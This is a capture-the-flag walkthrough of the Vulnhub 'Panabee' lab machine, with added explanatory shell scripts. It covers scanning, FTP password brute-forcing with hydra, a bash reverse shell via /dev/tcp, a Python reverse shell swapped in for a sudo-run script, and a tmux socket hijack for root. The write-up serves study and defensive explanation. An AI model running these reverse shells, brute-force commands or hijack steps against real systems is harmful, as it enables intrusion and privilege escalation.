Vulnhub Panabee machine: detailed walkthrough

Panabee

Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH
192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH
Using netdiscover on Kali Linux, the target host is identified as 192.168.56.228 (the other two entries are the host-only adapter and the VirtualBox DHCP server).
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2023-03-23T11:21:52
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
Six ports are open: vsftpd 3.0.3, OpenSSH 8.2p1, Postfix (advertising VRFY, so usernames can be confirmed against the mail server), an Apache default page, and Samba 4.6.2 on 139/445 with SMB signing not required.
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 14 23:08:42 2020
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  note.txt                            N      265  Sun Jun 14 23:08:42 2020
                20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Thu Mar 23 07:23:20 2023
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  test.txt                            A       12  Thu Mar 23 07:23:20 2023
  note.txt                            N      265  Sun Jun 14 23:08:42 2020
                20508240 blocks of size 1024. 12823528 blocks available
The note share accepts an empty password (anonymous access) and is writable: put test.txt succeeds. The share name is not enumerated on the page; smbclient -L //192.168.56.228 would list it. Inside smbclient, ls takes no -alh flags, hence the NT_STATUS_NO_SUCH_FILE above.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt
Dear goper,
I'll just leave it here as a note,
Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.
Please delete this note once you've read for security measure

  • goper is probably a username.
  • Some scheduled task is running (periodic backup of files in the home directory).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.228
+ Target Hostname:    192.168.56.228
+ Target Port:        80
+ Start Time:         2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
The web scan turns up nothing beyond the default Apache page, so the next step is brute-forcing the FTP password with hydra, using the username goper from the note. (The SMTP server advertises VRFY, which would have confirmed the account exists before spending a full wordlist on it.)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 Jun 14  2020 .cache
drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp>
The FTP root looks like goper's home directory (dotfiles owned by uid 1000, a .sudo_as_admin_successful marker, and a status.py owned by root), and uploads work, so the plan is to drop an SSH public key into .ssh/authorized_keys and log in with the matching private key.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .   =Xo.    |
|     .o += +     |
|   .o +oo++ o    |
|  o+.+o+oE.=oo   |
|.oo+ooo.S o.==.  |
|....+    . =.oo  |
|   .      . +.   |
|           ..    |
|            ..   |
+----[SHA256]-----+

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls
goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper goper@192.168.56.228
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
goper@192.168.56.228: Permission denied (publickey).
But the login is refused with Permission denied (publickey), so this route is closed. The page does not show why; a plausible cause is visible in the later directory listing, where /home/goper is drwxrwxr-x goper ftp, i.e. group-writable. With its default StrictModes yes, sshd silently ignores authorized_keys when the home directory, ~/.ssh or the key file itself is owned by someone else or writable by group or others, and nothing uploaded over FTP can change the mode of the home directory.
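Whether sshd would accept a key can be checked without guessing. The script below is an added example, not code from the original post: it reproduces the ownership and mode checks sshd applies under StrictModes yes to the home directory, ~/.ssh and authorized_keys, then runs them against a constructed directory tree that mirrors the drwxrwxr-x home directory seen later in the walkthrough. It assumes GNU stat (Linux).

```shell
#!/bin/sh
# Added example, not from the original post. Mimics sshd's StrictModes checks:
# each of HOME, HOME/.ssh and HOME/.ssh/authorized_keys must exist, be owned by
# the login user (or root) and must not be writable by group or others.
# Assumes GNU stat (-c). The demo tree at the bottom is constructed locally.

# sshd_strictmodes_ok HOME_DIR -> 0 if sshd would honour the authorized_keys file
sshd_strictmodes_ok() {
    home=$1
    uid=$(id -u)
    for p in "$home" "$home/.ssh" "$home/.ssh/authorized_keys"; do
        if [ ! -e "$p" ]; then
            echo "reject: $p does not exist"; return 1
        fi
        owner=$(stat -c %u "$p")
        if [ "$owner" != "$uid" ] && [ "$owner" != 0 ]; then
            echo "reject: $p not owned by uid $uid or root"; return 1
        fi
        # ls-style mode string: character 6 is group write, character 9 is other write
        case $(stat -c %A "$p") in
            ?????w*|????????w*)
                echo "reject: $p is group- or world-writable"; return 1 ;;
        esac
    done
    echo "accept: $home/.ssh/authorized_keys would be used"
    return 0
}

# Demo: a home directory shaped like /home/goper (drwxrwxr-x), then fixed to 755.
demo=$(mktemp -d)
mkdir -m 775 "$demo/goper"
mkdir -m 700 "$demo/goper/.ssh"
: > "$demo/goper/.ssh/authorized_keys"
chmod 600 "$demo/goper/.ssh/authorized_keys"
sshd_strictmodes_ok "$demo/goper" || true   # rejected: home directory is group-writable
chmod 755 "$demo/goper"
sshd_strictmodes_ok "$demo/goper" || true   # accepted
rm -rf "$demo"
```

On the target this is exactly the situation an FTP-only foothold cannot fix: the uploads create .ssh and authorized_keys with acceptable modes, but the home directory's group-write bit is outside the attacker's control, so the check fails before the key is ever read.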
So instead, write a bash reverse shell, upload it to the FTP root (goper's home directory) and see whether the backup job mentioned in the note executes it.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1
Following the note, the script is uploaded as backup.sh so that the scheduled backup job picks it up. That the job looks for this name is a guess from the note; the shell listing below shows backup.sh with mode -rwx--x--x, whereas the other FTP uploads landed as -rw-------, so the job itself appears to make the file executable before running it.
ftp> put backup.sh
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
-rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
-rw------- 1 goper goper   12 Mar 23 11:40 test.txt
-rw------- 1 goper goper  11K Jun 15  2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py
The sudo rule runs a script that lives in goper's own home directory. status.py is owned by root with mode 644, so it cannot be edited in place, but goper owns /home/goper and can therefore unlink it and upload a new status.py over FTP. Replacing it with a Python reverse shell and invoking the sudo rule gives a shell as jenny. One snag to expect: FTP uploads land with mode 600, so jenny cannot read the new file until it is made readable (chmod 644 is enough; the walkthrough uses 777).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This first version is a shell one-liner, not a Python file: python3 would fail on the leading python3 -c '...'. It was trimmed to the bare Python shown further down before the upload (the uploaded file is 232 bytes, which matches the trimmed version).
goper@panabee:~$ rm -rf status.py
rm -rf status.py
ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
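Both footholds so far have the same shape: a privileged job (the backup job running backup.sh, and the sudo rule running /home/goper/status.py as jenny) executes a file that the less privileged user can replace. status.py being root-owned with mode 644 did not help, because goper owns the directory and unlink-plus-recreate is as good as write. The script below is an added example, not code from the original post: it decides replaceability from ls -l style metadata, fed here with the listing lines from this walkthrough as constructed input (no filesystem access), and shows the fix of keeping such targets in a root-owned directory. Group membership is whatever list you pass in.

```shell
#!/bin/sh
# Added example, not from the original post. Decides whether USER can change
# what a privileged job will execute, from ls -l style metadata:
#   - write the file in place (owner/group/other write bit), or
#   - write the parent directory, i.e. unlink it and drop in a new file,
#     unless the directory is sticky and USER owns neither file nor directory.
# Input lines are constructed from the listings in this walkthrough.

# can_write USER "GROUPS" MODE OWNER GROUP -> 0 if USER may write the object
can_write() {
    cw_user=$1 cw_groups=$2 cw_mode=$3 cw_owner=$4 cw_group=$5
    [ "$cw_user" = root ] && return 0
    if [ "$cw_owner" = "$cw_user" ]; then          # owner bits apply exclusively
        case $cw_mode in ??w*) return 0 ;; esac
        return 1
    fi
    for g in $cw_groups; do                         # then the group bits
        if [ "$g" = "$cw_group" ]; then
            case $cw_mode in ?????w*) return 0 ;; esac
            return 1
        fi
    done
    case $cw_mode in ????????w*) return 0 ;; esac   # finally "other"
    return 1
}

# replaceable USER "GROUPS" "ls -l line of the file" "ls -l line of its directory"
replaceable() {
    r_user=$1 r_groups=$2 r_file=$3 r_dir=$4
    set -- $r_file; f_mode=$1 f_owner=$3
    set -- $r_dir;  d_mode=$1 d_owner=$3 d_group=$4
    set -- $r_file; f_group=$4
    can_write "$r_user" "$r_groups" "$f_mode" "$f_owner" "$f_group" && return 0
    can_write "$r_user" "$r_groups" "$d_mode" "$d_owner" "$d_group" || return 1
    case $d_mode in
        *[tT])   # sticky directory (like /tmp): only the file's or the dir's owner may unlink
            if [ "$f_owner" = "$r_user" ] || [ "$d_owner" = "$r_user" ]; then return 0; fi
            return 1 ;;
        *) return 0 ;;
    esac
}

# Listing lines taken from the walkthrough's ls -alh output (constructed input)
GOPER_HOME='drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .'
STATUS_PY='-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py'
BACKUP_SH='-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh'
# The fix: a root-owned, non-writable directory for sudo and cron targets
ROOT_DIR='drwxr-xr-x 2 root  root   4.0K Jun 15  2020 .'

report() {   # report LABEL USER "GROUPS" FILE_LINE DIR_LINE
    label=$1; shift
    if replaceable "$@"; then echo "$label: REPLACEABLE by $1"; else echo "$label: safe from $1"; fi
}
report "status.py in /home/goper"     goper "goper ftp" "$STATUS_PY" "$GOPER_HOME"
report "backup.sh in /home/goper"     goper "goper ftp" "$BACKUP_SH" "$GOPER_HOME"
report "status.py in /home/goper"     jenny "jenny"     "$STATUS_PY" "$GOPER_HOME"
report "status.py in root-owned dir"  goper "goper ftp" "$STATUS_PY" "$ROOT_DIR"
```

The same rule applies to the backup job: a cron entry that runs a script from the user's home directory hands that user the job's privileges, and ownership of the script alone does not protect it while the directory stays user-owned.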
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0
.bash_history mentions a secret.zip file, which I downloaded to Kali Linux.
Cracking it failed, though; the privilege escalation on this machine goes through .tmux-0 instead.
Privilege escalation
cd /root
# ls -alh
ls -alh
total 80K
drwx------  5 root root 4.0K Jun 30  2020 .
drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root  18K Jun 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jun 14  2020 .cache
-rw-------  1 root root   38 Jun 30  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
drwx------  2 root root 4.0K Jun 14  2020 .ssh
-rw-------  1 root root  13K Jun 21  2020 .viminfo
__                  __   ___  ___
|__)  /\  |\ |  /\  |__) |__  |__
|    /~~\ | \| /~~\ |__) |___ |___
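The post names the .tmux-0 directory but does not show the step that turns it into a root shell. What is on the page is that /home/jenny/.tmux-0 is drwxrwxr-x root jenny: a root-owned directory that jenny's group can write, holding a tmux server socket. Whoever can write to a tmux server socket can attach to its sessions with the server's privileges, so a root tmux server whose socket is reachable by jenny is a root shell for jenny. The script below is an added example, not code from the original post: it lists UNIX sockets under the given directories that the current user can write to and prints the tmux attach command for each. The socket name default and the -S attach invocation are ordinary tmux usage and an assumption about this box, since the post never shows them. tmux normally keeps its sockets under /tmp/tmux-<uid>/ with a mode-700 directory; -S lets a user put one anywhere, which is what went wrong here.

```shell
#!/bin/sh
# Added example, not from the original post. Finds UNIX sockets the current
# user can connect to and prints a tmux attach command for each one, since a
# writable tmux server socket gives control of that server's sessions with the
# server's privileges. Assumes GNU stat for the owner lookup.

# is_hijackable PATH -> 0 if PATH is a UNIX socket writable by the caller
is_hijackable() {
    [ -S "$1" ] && [ -w "$1" ]
}

# socket_owner PATH -> owner name of the socket (the server usually runs as that user)
socket_owner() {
    stat -c %U "$1" 2>/dev/null || echo '?'
}

# find_hijackable_sockets DIR... -> one "tmux -S <socket> attach" line per hit
find_hijackable_sockets() {
    find "$@" -type s 2>/dev/null | while IFS= read -r s; do
        if is_hijackable "$s"; then
            printf 'tmux -S %s attach    # server owned by %s\n' "$s" "$(socket_owner "$s")"
        fi
    done
}

# Usual hiding places: tmux's default socket directories, home directories, /run
find_hijackable_sockets /tmp /home /run
```

On Panabee the candidate would be /home/jenny/.tmux-0/default (name assumed), and a shell inside the attached session runs as the server's user, which is consistent with the root listing of /root above.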